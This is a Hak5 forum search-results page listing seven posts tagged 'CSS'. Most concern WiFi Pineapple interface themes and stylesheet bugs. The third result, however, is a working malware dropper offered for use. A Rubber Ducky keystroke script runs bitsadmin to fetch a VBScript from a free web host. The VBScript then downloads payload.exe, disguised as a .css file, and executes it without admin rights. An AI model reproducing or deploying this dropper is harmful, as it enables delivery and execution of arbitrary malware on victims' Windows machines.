Jump to content

Search the Community

Showing results for tags 'CSS'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 7 results

  1. So I know we all have our own little tweaks and CSS magic that we may or may not perform on our Pineapples, but I welcome all that have their own interesting customizations to share. I am new to the community as a owner with the Nano being my first piece of hardware but have been following the Pineapple and it's community for years... \*Not Stalkerish at All*\... I posted a few pictures of my CSS trial by fire magic that I have been working on in another thread and would like to thank Darren for sorta spawning it's naming idea. ***New Update for Firmware 1.0.2/3*** Github Link Here If you have any questions please feel free to ask below or even share your own CSS schemes. A few images of what the CSS color scheme looks like in action through the different Module pages: (I have not loaded any of the HTML or Img files to the github only the CSS file for the color scheme.)
  2. Hello everyone! I searched across the internet for a theme dedicated to the Pineapple interface, in vain... I only found the "NSA Theme" on this post. So I was wondering if anyone here wanted to share his custom Pineapple Theme :D (I suck at css) Thanks!
  3. So, this script downloads VB script via cmd and witch downloads payload.exe. To use this script you'll need some prep to do. First, sign up for a free website hosting (like eu.pn). You don't need to create any website, just to use that host for easy payload downloads. Rename VB script from .vbs to .css, also do the same for the payload from .exe to .css. WHY? Because you can't upload other file formats but html, css, js, and image formats and you need a full path link for this to work! And NO, you don't have to have admin rights for this to work! VB script: SaveWebBinary "http://yourfreesubdomain.eu.pn/payload.css", "C:\Users\Public\payload.exe" Function SaveWebBinary(strUrl, strFile) 'As Boolean Const adTypeBinary = 1 Const adSaveCreateOverWrite = 2 Const ForWriting = 2 Dim web, varByteArray, strData, strBuffer, lngCounter, ado On Error Resume Next 'Download the file with any available object Err.Clear Set web = Nothing Set web = CreateObject("WinHttp.WinHttpRequest.5.1") If web Is Nothing Then Set web = CreateObject("WinHttp.WinHttpRequest") If web Is Nothing Then Set web = CreateObject("MSXML2.ServerXMLHTTP") If web Is Nothing Then Set web = CreateObject("Microsoft.XMLHTTP") web.Open "GET", strURL, False web.Send If Err.Number <> 0 Then SaveWebBinary = False Set web = Nothing Exit Function End If If web.Status <> "200" Then SaveWebBinary = False Set web = Nothing Exit Function End If varByteArray = web.ResponseBody Set web = Nothing 'Now save the file with any available method On Error Resume Next Set ado = Nothing Set ado = CreateObject("ADODB.Stream") If ado Is Nothing Then Set fs = CreateObject("Scripting.FileSystemObject") Set ts = fs.OpenTextFile(strFile, ForWriting, True) strData = "" strBuffer = "" For lngCounter = 0 to UBound(varByteArray) ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) Next ts.Close Else ado.Type = adTypeBinary ado.Open ado.Write varByteArray ado.SaveToFile strFile, adSaveCreateOverWrite ado.Close End If SaveWebBinary = True End Function wscript.sleep 5000 CreateObject("WScript.Shell").Run "C:\Users\Public\payload.exe" Ducky script: GUI r DELAY 200 STRING cmd /C bitsadmin /transfer /download /priority foreground http://yourfreesubdomain.eu.pn/vb_script.css C:\Users\Public\dl.vbs && start C:\Users\Public\dl.vbs ENTER Happy hacking!
  4. I downloaded and saved a CSS theme modification from a forum. Sad to say that it has disabled many of the features, including the ability to get back to the CSS editor to fix it. Is there a way to get back to the CSS editor, possibly through a URL for the interface and restore the original CSS? Also, any chance anyone could send the original CSS too? I just got this thing today and have already managed to make it unusable in 30 minutes. uggg.......
  5. My CSS not the best but it works
  6. Hello everyone, my name is Victor and I'm located in Sweden. Since two weeks back I've had a Pineapple Mark IV in my possesion, and I'm really happy with it. It's awesome in every single way. But, I grew tired of the Control Center design-wise. What I did was to check this forum if there where any stylesheets to download and use on my pineapple. But I couldn't find anything else than some color changes. So I made my own, and as the Pineapple itself is open-source, I see no other reason than to share it with you. https://github.com/xeloader/The-Dutchess Enjoy! P.S There's a screenshot of the theme itself in the README.md. P.S2There's like 5 unnecessary commits in my repo, but, it's my first time using github. It's okay. Keep calm.
  7. In the source for the urlsnarf module version 2.4 on firmware 2.7, the CSS resource is linked as follows: <link rel="stylesheet" type="text/css" href="css/urlsnarf.css" /> <link rel="stylesheet" type="text/css" href="css/firmware.css" /> [/CODE] These files do not exist when installed to USB or internal memory, causing the page to render incorrectly. I've tried removing and re-installing to no avail. Not sure why this is - it seemed to work fine before firmware 2.7 was installed.
×
×
  • Create New...